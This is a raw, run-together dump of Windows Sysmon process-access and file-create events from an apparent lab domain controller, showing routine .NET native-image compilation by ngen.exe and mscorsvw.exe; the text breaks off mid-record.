13:48:15.154{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.154{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:15.029{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1320-0\System.Workflow.Activities.dll2021-01-18 13:48:15.029 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.560{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.545{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.545{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:18.467{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A2-6005-E202-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:18.295{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f8-0\System.Workflow.ComponentModel.dll2021-01-18 13:48:18.295 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.466{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.451{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.451{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.357{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.357{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:20.248{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\35c-0\System.Workflow.Runtime.dll2021-01-18 13:48:20.248 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.841{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.826{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.826{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.779{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ac0-0\System.Xml.Serialization.dll2021-01-18 13:48:21.779 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.763{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.748{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.748{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.701{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.701{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.654{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\88c-0\System.Xaml.Hosting.dll2021-01-18 13:48:21.654 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 